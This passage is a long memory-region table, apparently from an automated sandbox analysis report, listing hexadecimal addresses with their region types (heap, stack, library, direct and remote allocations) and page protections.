page read and write
|
||
4E4A000
|
trusted library allocation
|
page execute and read and write
|
||
279AEFA3000
|
heap
|
page read and write
|
||
279AD0A4000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
24AEAADF000
|
heap
|
page read and write
|
||
4E40000
|
trusted library allocation
|
page read and write
|
||
2C3E000
|
stack
|
page read and write
|
||
88E7000
|
stack
|
page read and write
|
||
2230F000
|
stack
|
page read and write
|
||
279AEFA6000
|
heap
|
page read and write
|
||
49D957F000
|
stack
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
744E000
|
stack
|
page read and write
|
||
120000
|
heap
|
page read and write
|
||
6D86E83000
|
stack
|
page read and write
|
||
279AF084000
|
heap
|
page read and write
|
||
6D883CB000
|
stack
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
4F0F000
|
stack
|
page read and write
|
||
44E4000
|
heap
|
page read and write
|
||
355A000
|
heap
|
page read and write
|
||
4FAC000
|
stack
|
page read and write
|
||
279AEF7E000
|
heap
|
page read and write
|
||
24AEAA70000
|
trusted library allocation
|
page read and write
|
||
7B61000
|
heap
|
page read and write
|
||
4E55000
|
trusted library allocation
|
page execute and read and write
|
||
279AEDCF000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2D0E000
|
stack
|
page read and write
|
||
1BF5C4D0000
|
heap
|
page read and write
|
||
7871000
|
heap
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
120000
|
heap
|
page read and write
|
||
24AEC4A0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEEED000
|
heap
|
page read and write
|
||
2C48000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
9000000
|
direct allocation
|
page read and write
|
||
279AEF7E000
|
heap
|
page read and write
|
||
3510000
|
heap
|
page read and write
|
||
24AEAA80000
|
heap
|
page readonly
|
||
279AEEEC000
|
heap
|
page read and write
|
||
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
7D6E000
|
stack
|
page read and write
|
||
279AEDC0000
|
heap
|
page read and write
|
||
279AF077000
|
heap
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
D8D38FF000
|
stack
|
page read and write
|
||
279AF185000
|
heap
|
page read and write
|
||
279AD0B1000
|
heap
|
page read and write
|
||
696000
|
system
|
page execute and read and write
|
||
279AEDA8000
|
heap
|
page read and write
|
||
74CE000
|
stack
|
page read and write
|
||
4902000
|
unclassified section
|
page read and write
|
||
279AEF23000
|
heap
|
page read and write
|
||
D8D35FB000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
6D882CE000
|
stack
|
page read and write
|
||
6D874FE000
|
stack
|
page read and write
|
||
4ED0000
|
trusted library allocation
|
page execute and read and write
|
||
279AEEC2000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEEC3000
|
heap
|
page read and write
|
||
22656000
|
heap
|
page read and write
|
||
2260B000
|
stack
|
page read and write
|
||
8C40000
|
heap
|
page read and write
|
||
24A81E41000
|
trusted library allocation
|
page read and write
|
||
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
8FB0000
|
direct allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEF3E000
|
heap
|
page read and write
|
||
748E000
|
stack
|
page read and write
|
||
6D86F8E000
|
stack
|
page read and write
|
||
279AD0D0000
|
heap
|
page read and write
|
||
1C2F2000
|
system
|
page read and write
|
||
141000
|
unkown
|
page readonly
|
||
279AEDBF000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEF7E000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4346000
|
heap
|
page read and write
|
||
30000
|
unkown
|
page readonly
|
||
279AF0E6000
|
heap
|
page read and write
|
||
1BF5E0BE000
|
trusted library allocation
|
page read and write
|
||
279AF135000
|
heap
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
498000
|
stack
|
page read and write
|
||
7863000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
325C000
|
stack
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
100000
|
heap
|
page read and write
|
||
6FA8000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
5D0000
|
unkown
|
page read and write
|
||
21A0000
|
unkown
|
page readonly
|
||
6D872FD000
|
stack
|
page read and write
|
||
6B2000
|
system
|
page execute and read and write
|
||
22C81000
|
direct allocation
|
page execute and read and write
|
||
279AD09F000
|
heap
|
page read and write
|
||
7868000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4E70000
|
trusted library allocation
|
page read and write
|
||
4753000
|
remote allocation
|
page execute and read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
6F20000
|
heap
|
page read and write
|
||
7908000
|
heap
|
page read and write
|
||
4619000
|
direct allocation
|
page execute and read and write
|
||
1F0000
|
unkown
|
page readonly
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
6FA7000
|
heap
|
page read and write
|
||
786B000
|
heap
|
page read and write
|
||
350F000
|
stack
|
page read and write
|
||
30000
|
unkown
|
page readonly
|
||
1BF5DDB0000
|
heap
|
page read and write
|
||
789C000
|
heap
|
page read and write
|
||
1C0000
|
unkown
|
page read and write
|
||
CB7000
|
heap
|
page read and write
|
||
1BF5DF21000
|
trusted library allocation
|
page read and write
|
||
260C000
|
unkown
|
page read and write
|
||
8910000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
4EBE000
|
stack
|
page read and write
|
||
237745C5000
|
heap
|
page read and write
|
||
2292D000
|
heap
|
page read and write
|
||
4E2D000
|
trusted library allocation
|
page execute and read and write
|
||
8AAC000
|
stack
|
page read and write
|
||
8C4C000
|
heap
|
page read and write
|
||
279AD0BB000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEED6000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A90010000
|
trusted library allocation
|
page read and write
|
||
F0000
|
unkown
|
page readonly
|
||
7A87000
|
trusted library allocation
|
page read and write
|
||
7B65000
|
heap
|
page read and write
|
||
7EC0000
|
trusted library allocation
|
page read and write
|
||
279AEF02000
|
heap
|
page read and write
|
||
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
76DA000
|
stack
|
page read and write
|
||
279AF10A000
|
heap
|
page read and write
|
||
212F0470000
|
heap
|
page read and write
|
||
24AECBD4000
|
heap
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
5F6000
|
heap
|
page read and write
|
||
279AEE06000
|
heap
|
page read and write
|
||
24A81E4B000
|
trusted library allocation
|
page read and write
|
||
6F8F000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AF134000
|
heap
|
page read and write
|
||
279AEED6000
|
heap
|
page read and write
|
||
8AC0000
|
trusted library allocation
|
page execute and read and write
|
||
21EE0000
|
direct allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
279AEFA2000
|
heap
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
CA1000
|
heap
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
CA1000
|
heap
|
page read and write
|
||
8AD0000
|
heap
|
page read and write
|
||
AA000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2FBE000
|
stack
|
page read and write
|
||
279AEDDD000
|
heap
|
page read and write
|
||
279AEF31000
|
heap
|
page read and write
|
||
6F8F000
|
heap
|
page read and write
|
||
47DE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
34CE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
167000
|
unkown
|
page readonly
|
||
24AECA17000
|
heap
|
page read and write
|
||
4FD000
|
stack
|
page read and write
|
||
7B47000
|
heap
|
page read and write
|
||
1BF5C4CC000
|
heap
|
page read and write
|
||
446F000
|
stack
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
8E90000
|
trusted library allocation
|
page read and write
|
||
279AEDAB000
|
heap
|
page read and write
|
||
24AEC390000
|
trusted library allocation
|
page read and write
|
||
75DB000
|
stack
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
279AEDCD000
|
heap
|
page read and write
|
||
2253E000
|
stack
|
page read and write
|
||
4FBF000
|
stack
|
page read and write
|
||
5153000
|
remote allocation
|
page execute and read and write
|
||
1BF5E0AB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
48BE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7BFEDDD000
|
stack
|
page read and write
|
||
24AEAA90000
|
heap
|
page read and write
|
||
279AD0A1000
|
heap
|
page read and write
|
||
6F38000
|
heap
|
page read and write
|
||
8F90000
|
direct allocation
|
page read and write
|
||
7BFF0FE000
|
unkown
|
page read and write
|
||
7BFF1FF000
|
stack
|
page read and write
|
||
370E000
|
stack
|
page read and write
|
||
15E000
|
unkown
|
page readonly
|
||
7EB0000
|
trusted library allocation
|
page read and write
|
||
279AEE3B000
|
heap
|
page read and write
|
||
4DCE000
|
stack
|
page read and write
|
||
E90000
|
trusted library allocation
|
page read and write
|
||
279AF07C000
|
heap
|
page read and write
|
||
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
2324000
|
heap
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
279AF280000
|
remote allocation
|
page read and write
|
||
4E8E000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A90001000
|
trusted library allocation
|
page read and write
|
||
279AEF0B000
|
heap
|
page read and write
|
||
68C000
|
system
|
page execute and read and write
|
||
E0000
|
unkown
|
page readonly
|
||
8E50000
|
trusted library allocation
|
page read and write
|
||
279AEEC0000
|
heap
|
page read and write
|
||
279AEDA8000
|
heap
|
page read and write
|
||
24A82048000
|
trusted library allocation
|
page read and write
|
||
279AEF84000
|
heap
|
page read and write
|
||
40000
|
unkown
|
page readonly
|
||
6F72000
|
heap
|
page read and write
|
||
1C9B4000
|
system
|
page read and write
|
||
357F000
|
heap
|
page read and write
|
||
760000
|
unkown
|
page read and write
|
||
5048000
|
trusted library allocation
|
page read and write
|
||
150000
|
unkown
|
page readonly
|
||
6FA1000
|
heap
|
page read and write
|
||
2D4E000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
771E000
|
stack
|
page read and write
|
||
24A9030F000
|
trusted library allocation
|
page read and write
|
||
279AEF76000
|
heap
|
page read and write
|
||
6FBB000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A81AB2000
|
trusted library allocation
|
page read and write
|
||
279AD0B1000
|
heap
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
4F38000
|
trusted library allocation
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
279AEF23000
|
heap
|
page read and write
|
||
279AEF86000
|
heap
|
page read and write
|
||
279AEF9E000
|
heap
|
page read and write
|
||
224E0000
|
heap
|
page read and write
|
||
1BF5E001000
|
trusted library allocation
|
page read and write
|
||
33E0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4F04000
|
unclassified section
|
page read and write
|
||
24AECA23000
|
heap
|
page read and write
|
||
279AD00E000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
50FF000
|
stack
|
page read and write
|
||
24AEA9B0000
|
heap
|
page read and write
|
||
279AEF6D000
|
heap
|
page read and write
|
||
279AEDA2000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4F8F000
|
stack
|
page read and write
|
||
6EF0000
|
direct allocation
|
page read and write
|
||
22800000
|
heap
|
page read and write
|
||
279AD05D000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
2D7E000
|
stack
|
page read and write
|
||
279AF280000
|
remote allocation
|
page read and write
|
||
279AEDA4000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
279AF077000
|
heap
|
page read and write
|
||
279AEEB7000
|
heap
|
page read and write
|
||
22929000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4F67000
|
heap
|
page read and write
|
||
22D00000
|
unclassified section
|
page execute and read and write
|
||
279AD069000
|
heap
|
page read and write
|
||
24AEAAD9000
|
heap
|
page read and write
|
||
481F000
|
stack
|
page read and write
|
||
A233000
|
direct allocation
|
page execute and read and write
|
||
B91000
|
unkown
|
page readonly
|
||
7E40000
|
trusted library allocation
|
page execute and read and write
|
||
CA1000
|
heap
|
page read and write
|
||
520C000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
279AF0C4000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
279AEFAE000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
244C000
|
unkown
|
page read and write
|
||
AA000
|
stack
|
page read and write
|
||
8900000
|
trusted library allocation
|
page execute and read and write
|
||
7842000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
8C57000
|
heap
|
page read and write
|
||
1BF5E0C4000
|
trusted library allocation
|
page read and write
|
||
279AEE38000
|
heap
|
page read and write
|
||
6F8F000
|
heap
|
page read and write
|
||
4E24000
|
trusted library allocation
|
page read and write
|
||
279AF062000
|
heap
|
page read and write
|
||
279AF0AC000
|
heap
|
page read and write
|
||
8C95000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A81AA4000
|
trusted library allocation
|
page read and write
|
||
279AF0AC000
|
heap
|
page read and write
|
||
24AECA4C000
|
heap
|
page read and write
|
||
23774250000
|
heap
|
page read and write
|
||
D8D31FE000
|
stack
|
page read and write
|
||
2257F000
|
stack
|
page read and write
|
||
279AEF84000
|
heap
|
page read and write
|
||
1FE4000
|
heap
|
page read and write
|
||
1BF5DF00000
|
trusted library allocation
|
page read and write
|
||
150000
|
unkown
|
page readonly
|
||
6D873FE000
|
stack
|
page read and write
|
||
24AEC4A4000
|
heap
|
page read and write
|
||
24A809CF000
|
trusted library allocation
|
page read and write
|
||
279AF1C1000
|
heap
|
page read and write
|
||
2ED0000
|
direct allocation
|
page read and write
|
||
4EC0000
|
heap
|
page readonly
|
||
7EBF000
|
stack
|
page read and write
|
||
47C1000
|
direct allocation
|
page execute and read and write
|
||
224CF000
|
stack
|
page read and write
|
||
1BF5DD50000
|
heap
|
page read and write
|
||
38C0000
|
heap
|
page read and write
|
||
6E17000
|
heap
|
page read and write
|
||
956DFFC000
|
stack
|
page read and write
|
||
279AEE28000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
7DAE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24A813F4000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEEDE000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
619000
|
heap
|
page read and write
|
||
279AF0AC000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7844000
|
heap
|
page read and write
|
||
279AEDE2000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
4950000
|
heap
|
page read and write
|
||
22C7D000
|
direct allocation
|
page execute and read and write
|
||
1BF5E000000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
279AF064000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279ACF40000
|
heap
|
page read and write
|
||
4920000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEE1A000
|
heap
|
page read and write
|
||
279AEF67000
|
heap
|
page read and write
|
||
8BFE000
|
stack
|
page read and write
|
||
279AEEB0000
|
heap
|
page read and write
|
||
279AF280000
|
remote allocation
|
page read and write
|
||
6F88000
|
heap
|
page read and write
|
||
1FE0000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
24A81E92000
|
trusted library allocation
|
page read and write
|
||
279AF132000
|
heap
|
page read and write
|
||
4B1C000
|
unclassified section
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEF3E000
|
heap
|
page read and write
|
||
4E4E000
|
stack
|
page read and write
|
||
1BF5C360000
|
system
|
page execute and read and write
|
||
6D877FE000
|
stack
|
page read and write
|
||
24A82063000
|
trusted library allocation
|
page read and write
|
||
2290000
|
unkown
|
page read and write
|
||
78E6000
|
heap
|
page read and write
|
||
279AF061000
|
heap
|
page read and write
|
||
D8D2DB9000
|
stack
|
page read and write
|
||
7F5B000
|
stack
|
page read and write
|
||
3283000
|
unkown
|
page execute and read and write
|
||
279AEDCA000
|
heap
|
page read and write
|
||
500000
|
unkown
|
page readonly
|
||
279AEF02000
|
heap
|
page read and write
|
||
22CF2000
|
direct allocation
|
page execute and read and write
|
||
24A80001000
|
trusted library allocation
|
page read and write
|
||
2343000
|
unkown
|
page read and write
|
||
279AD0A4000
|
heap
|
page read and write
|
||
2C3B000
|
stack
|
page read and write
|
||
22650000
|
heap
|
page read and write
|
||
279AF064000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
8BBB000
|
stack
|
page read and write
|
||
6F88000
|
heap
|
page read and write
|
||
2C79000
|
stack
|
page read and write
|
||
898D000
|
stack
|
page read and write
|
||
32F1000
|
unkown
|
page execute and read and write
|
||
7E3C000
|
stack
|
page read and write
|
||
1FE0000
|
heap
|
page read and write
|
||
7A4F000
|
stack
|
page read and write
|
||
6EC0000
|
direct allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
2E76000
|
heap
|
page read and write
|
||
2CC0000
|
heap
|
page read and write
|
||
279AF0BD000
|
heap
|
page read and write
|
||
279AF1B5000
|
heap
|
page read and write
|
||
279AF0D3000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
150000
|
unkown
|
page readonly
|
||
510000
|
heap
|
page read and write
|
||
167000
|
unkown
|
page readonly
|
||
24AEC4BE000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
8F70000
|
direct allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
619000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
702E000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
4E50000
|
trusted library allocation
|
page read and write
|
||
279AF084000
|
heap
|
page read and write
|
||
279AEFA3000
|
heap
|
page read and write
|
||
62A1000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEF29000
|
heap
|
page read and write
|
||
8F50000
|
direct allocation
|
page read and write
|
||
5F8000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279ACFB0000
|
heap
|
page read and write
|
||
3300000
|
heap
|
page read and write
|
||
130000
|
unkown
|
page read and write
|
||
8FD0000
|
direct allocation
|
page read and write
|
||
22A0000
|
unkown
|
page read and write
|
||
279AEF3E000
|
heap
|
page read and write
|
||
358C000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
8FA0000
|
direct allocation
|
page read and write
|
||
89E0000
|
trusted library allocation
|
page execute and read and write
|
||
2000000
|
heap
|
page read and write
|
||
8EEE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
8F2C000
|
stack
|
page read and write
|
||
24AEAA9B000
|
heap
|
page read and write
|
||
4340000
|
trusted library allocation
|
page execute and read and write
|
||
15E000
|
unkown
|
page readonly
|
||
237742F0000
|
heap
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
279AEDC5000
|
heap
|
page read and write
|
||
7BC2000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
613000
|
heap
|
page read and write
|
||
7FAD0000
|
trusted library allocation
|
page execute and read and write
|
||
500000
|
unkown
|
page readonly
|
||
7DEE000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
6C8000
|
heap
|
page read and write
|
||
3528000
|
heap
|
page read and write
|
||
279AEEDE000
|
heap
|
page read and write
|
||
4FEF000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
279AEDF6000
|
heap
|
page read and write
|
||
3550000
|
heap
|
page read and write
|
||
279AF073000
|
heap
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
750F000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
24AECE20000
|
heap
|
page read and write
|
||
2240B000
|
stack
|
page read and write
|
||
279AEE2B000
|
heap
|
page read and write
|
||
279AEF3E000
|
heap
|
page read and write
|
||
2324000
|
heap
|
page read and write
|
||
4BAE000
|
stack
|
page read and write
|
||
22FC000
|
stack
|
page read and write
|
||
7E0000
|
unkown
|
page read and write
|
||
279AEE43000
|
heap
|
page read and write
|
||
4FC000
|
stack
|
page read and write
|
||
1BF5C4AA000
|
heap
|
page read and write
|
||
2190000
|
heap
|
page read and write
|
||
279AF0AC000
|
heap
|
page read and write
|
||
24A80858000
|
trusted library allocation
|
page read and write
|
||
6D8737E000
|
stack
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
524000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
96E0000
|
direct allocation
|
page execute and read and write
|
||
C80000
|
unkown
|
page readonly
|
||
613000
|
heap
|
page read and write
|
||
35EC000
|
heap
|
page read and write
|
||
6D8747E000
|
stack
|
page read and write
|
||
C81000
|
unkown
|
page readonly
|
||
279ACF10000
|
heap
|
page read and write
|
||
8920000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
7AC0000
|
heap
|
page read and write
|
||
1BF5C4B0000
|
heap
|
page read and write
|
||
4FF1000
|
trusted library allocation
|
page read and write
|
||
6E15000
|
heap
|
page read and write
|
||
60A000
|
heap
|
page read and write
|
||
2C40000
|
heap
|
page read and write
|
||
6E00000
|
heap
|
page read and write
|
||
279AEF7E000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
7B95000
|
heap
|
page read and write
|
||
23774359000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
6D8777E000
|
stack
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
CA1000
|
heap
|
page read and write
|
||
77F0000
|
heap
|
page read and write
|
||
4E30000
|
trusted library allocation
|
page read and write
|
||
1BF5C3C1000
|
system
|
page execute and read and write
|
||
4853000
|
unclassified section
|
page read and write
|
||
7930000
|
trusted library allocation
|
page read and write
|
||
4D8B000
|
stack
|
page read and write
|
There are 1301 hidden memdumps, click here to show them.